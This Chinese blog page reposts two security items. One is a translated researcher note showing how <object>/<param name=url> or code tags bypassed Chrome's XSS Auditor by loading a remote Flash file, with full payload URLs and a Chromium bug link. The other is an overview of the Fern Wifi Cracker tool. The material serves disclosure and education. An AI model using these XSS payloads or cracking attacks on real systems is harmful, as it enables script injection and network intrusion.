搜索此博客

2016年12月28日星期三

使用param标签绕过XSS Auditor

本邮件内容由第三方提供,如果您不想继续收到该邮件,可 点此退订
使用param标签绕过XSS Auditor  阅读原文»

原文链接:MKSB

原作者:Masato Kinugawa

译:Holic (知道创宇404安全实验室)

Hi there!

出于一些原因,我在读 Chromium 的源码的时候,意外地发现了一个绕过 XSS 过滤器的方法。在这篇短文里,我将分享这一绕过方法。我已在此处进行了报告: https://bugs.chromium.org/p/chromium/issues/detail?id=676992

绕过方法如下:

https://vulnerabledoma.in/char_test?body=%3Cobject%20allowscriptaccess=always%3E%20%3Cparam%20name=url%20value=https://l0.cm/xss.swf%3E

<object allowscriptaccess=always>   <param name=url value=https://l0.cm/xss.swf>

当然这样也有效:

https://vulnerabledoma.in/char_test?body=%3Cobject%20allowscriptaccess=always%3E%20%3Cparam%20name=code%20value=https://l0.cm/xss.swf%3E

<object allowscriptaccess=always>   <param name=code value=https://l0.cm/xss.swf>

直到我在 HTMLObjectElement.cpp 中找到相关代码,我才知道 Chrome 竟会支持这些参数,:

20161228160527

<param name="src" value="//attacker/xss.swf"><param name="movie" value="//attacker/xss.swf"> 被 XSS 过滤器拦截了。但是我发现 codeurl 并没有被拦截。使用这一方法,我们可以加载 Flash 并执行 JavaScript。根据源代码的注释,看来 Chrome 出于兼容性的考虑支持这一特性。但至少我确认了它在 IE/Edge 上并不生效。我认为 Chrome 可以移除对它的支持
黑客技术官网地址:http://www.hackdig.com/

Fern Wifi Cracker :无线安全审计工具  阅读原文»

项目主页

https://github.com/savio-code/fern-wifi-cracker/

简介

Fern Wifi Cracker使用Python和Python Qt GUI库编写的无线安全审计和攻击软件程序,该程序能够破解和恢复WEP/WPA/WPS密钥,同时还运行其他基于网络的无线或基于以太网的攻击。

Fern-Wifi-Cracker-Wireless-Security-Auditing-Tool-640x440

该软件可以运行在任何安装了依赖的Linux机器上,并已在Ubuntu KDE/Gnome、BackTrack Linux和BackBox Linux上测试。

特征

Fern目前支持:

  • 使用Fragmentation、Chop-Chop、Caffe-Latte、Hirte、ARP请求重放或WPS攻击等进行WEP破解
  • 使用字典或基于WPS攻击进行WPA/WPA2破解
  • 成功破解后自动保存密钥到数据库
  • 自动接入点攻击系统
  • 会话劫持(被动和以太网模式)
  • 接入点MAC地址地理位置跟踪
  • 内部MITM引擎
  • Bruteforce攻击(HTTP、HTTPS、TELNET、FTP)
  • 更新支持

前提

Fern需要以下内容才能正常运行:

  • Aircrack-NG
  • Python-Scapy
  • Python Qt4
  • Python
  • Subversion
  • Xterm
  • Reaver (用于WPS攻击)
  • Macchanger

安装

在支持Debian软件包的系统上安装:

1482912364(1)

在终端上使用以下命令获取程序的源代码:

1482912477(1)

升级和更新

程序在每次运行时自动检查更新程序。

截图

1

2

8

其他项目

 

*转载请注明来自MottoIN


黑客技术官网地址:http://www.hackdig.com/

阅读更多内容

没有评论: